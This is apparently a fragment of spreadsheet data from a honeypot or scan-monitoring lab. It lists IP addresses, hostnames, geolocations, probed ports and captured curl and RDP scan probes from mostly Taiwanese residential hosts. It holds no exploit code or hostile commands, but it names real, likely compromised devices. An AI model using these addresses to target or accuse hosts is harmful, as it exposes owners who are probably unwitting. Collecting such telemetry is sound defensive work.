    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7221:8f0d</t>
  </si>
  <si>
    <t>34e8f3445089a5979d1785154a7414bc</t>
  </si>
  <si>
    <t>125.228.89.19</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-89-19.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;64077&amp;&amp;23&amp;&amp;49928&amp;&amp;51958&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7de4:5913</t>
  </si>
  <si>
    <t>ed784163abae647c6b3827655ba54aad</t>
  </si>
  <si>
    <t>133.204.55.91</t>
  </si>
  <si>
    <t>dcm1-133-204-55-91.tky.mesh.ad.jp</t>
  </si>
  <si>
    <t>BIGLOBE BIGLOBE Inc.</t>
  </si>
  <si>
    <t>NEC BIGLOBE Ltd.</t>
  </si>
  <si>
    <t>['ns02.mesh.ad.jp', 'ns03.mesh.ad.jp']</t>
  </si>
  <si>
    <t>Connected (2025/12/31)</t>
  </si>
  <si>
    <t>::ffff:85cc:375b</t>
  </si>
  <si>
    <t>d6862a1496aa9e7b347515f427c43489</t>
  </si>
  <si>
    <t>82.48.173.156</t>
  </si>
  <si>
    <t>host-82-48-173-156.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>Capri</t>
  </si>
  <si>
    <t>3180630</t>
  </si>
  <si>
    <t>40.5507</t>
  </si>
  <si>
    <t>14.2426</t>
  </si>
  <si>
    <t>::ffff:5230:ad9c</t>
  </si>
  <si>
    <t>a50d496c00ac4c8ed599491c32e9361d</t>
  </si>
  <si>
    <t>117.251.115.99</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H44&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;44393&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75fb:7363</t>
  </si>
  <si>
    <t>8910b2efa875571135e6ceef2f9db1e4</t>
  </si>
  <si>
    <t>23.95.186.186</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_RDP_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_RDP_H9</t>
  </si>
  <si>
    <t>3389&amp;&amp;23</t>
  </si>
  <si>
    <t>Buffalo (Downtown)</t>
  </si>
  <si>
    <t>14202</t>
  </si>
  <si>
    <t>42.893</t>
  </si>
  <si>
    <t>-78.8753</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}</t>
  </si>
  <si>
    <t>::ffff:175f:baba</t>
  </si>
  <si>
    <t>aef6649dc5b6ed2892ef2baf4d7d89fd</t>
  </si>
  <si>
    <t>117.247.87.21</t>
  </si>
  <si>
    <t>::ffff:75f7:5715</t>
  </si>
  <si>
    <t>2c0d387d3514bf3aa852f99fbc8d2405</t>
  </si>
  <si>
    <t>220.134.124.198</t>
  </si>
  <si>
    <t>220-134-124-198.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H27&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;17597&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:7cc6</t>
  </si>
  <si>
    <t>c6f14ba4232ba548d9743d00f09c8cea</t>
  </si>
  <si>
    <t>120.60.189.31</t>
  </si>
  <si>
    <t>::ffff:783c:bd1f</t>
  </si>
  <si>
    <t>649462000f296ebc49bb62922d2d3f80</t>
  </si>
  <si>
    <t>59.96.109.16</t>
  </si>
  <si>
    <t>::ffff:3b60:6d10</t>
  </si>
  <si>
    <t>6d9a94dc23c332f5f78d0d5b453e5593</t>
  </si>
  <si>
    <t>220.132.86.71</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-86-71.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;34520&amp;&amp;23&amp;&amp;43325&amp;&amp;9100&amp;&amp;80&amp;&amp;46490&amp;&amp;51300</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:5647</t>
  </si>
  <si>
    <t>b49a56f6b2637c82dbb71d8967954676</t>
  </si>
  <si>
    <t>122.117.93.26</t>
  </si>
  <si>
    <t>122-117-93-26.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MT-CPA_H12</t>
  </si>
  <si>
    <t>10559&amp;&amp;36450&amp;&amp;23&amp;&amp;38750&amp;&amp;9100&amp;&amp;80&amp;&amp;60057&amp;&amp;60074&amp;&amp;60100&amp;&amp;60113</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:5d1a</t>
  </si>
  <si>
    <t>e560eba5a20e1e226519cdf689628210</t>
  </si>
  <si>
    <t>220.134.135.153</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-135-153.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;35526&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc86:8799</t>
  </si>
  <si>
    <t>dfbc1cf9b7385e797cac9768e3ae4d16</t>
  </si>
  <si>
    <t>114.34.85.73</t>
  </si>
  <si>
    <t>114-34-85-73.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;26467&amp;&amp;23&amp;&amp;62609&amp;&amp;NA&amp;&amp;9100&amp;&amp;43822&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:7222:5549</t>
  </si>
  <si>
    <t>10ea8ae53c730296173a5cfa84be331d</t>
  </si>
  <si>
    <t>114.34.110.57</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-34-110-57.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;39292&amp;&amp;13248&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:6e39</t>
  </si>
  <si>
    <t>c881225c2d480262ff760a5664c9dc70</t>
  </si>
  <si>
    <t>220.133.82.198</t>
  </si>
  <si>
    <t>220-133-82-198.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>::ffff:dc85:52c6</t>
  </si>
  <si>
    <t>97392fb4e32bea9dd6b80ea7f22aa3a3</t>
  </si>
  <si>
    <t>220.135.126.118</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-126-118.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H13</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;NA&amp;&amp;41161&amp;&amp;51835&amp;&amp;51871&amp;&amp;51889&amp;&amp;51827&amp;&amp;51899&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:7e76</t>
  </si>
  <si>
    <t>1ecdc7a4a92be9d87bd568bfd6408eb5</t>
  </si>
  <si>
    <t>125.228.50.215</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-50-215.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>23&amp;&amp;65308&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7de4:32d7</t>
  </si>
  <si>
    <t>d2c5aacdf02b029a49a6b13ae2d0aa74</t>
  </si>
  <si>
    <t>114.33.80.80</t>
  </si>
  <si>
    <t>114-33-80-80.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:5050</t>
  </si>
  <si>
    <t>5ff69e7aa22f7adfc8447e184d15b0d4</t>
  </si>
  <si>
    <t>220.133.196.95</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-196-95.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;63347&amp;&amp;23&amp;&amp;61677&amp;&amp;41840&amp;&amp;41882&amp;&amp;33674&amp;&amp;9100&amp;&amp;NA&amp;&amp;53686&amp;&amp;40578&amp;&amp;80&amp;&amp;24018</t>
  </si>
  <si>
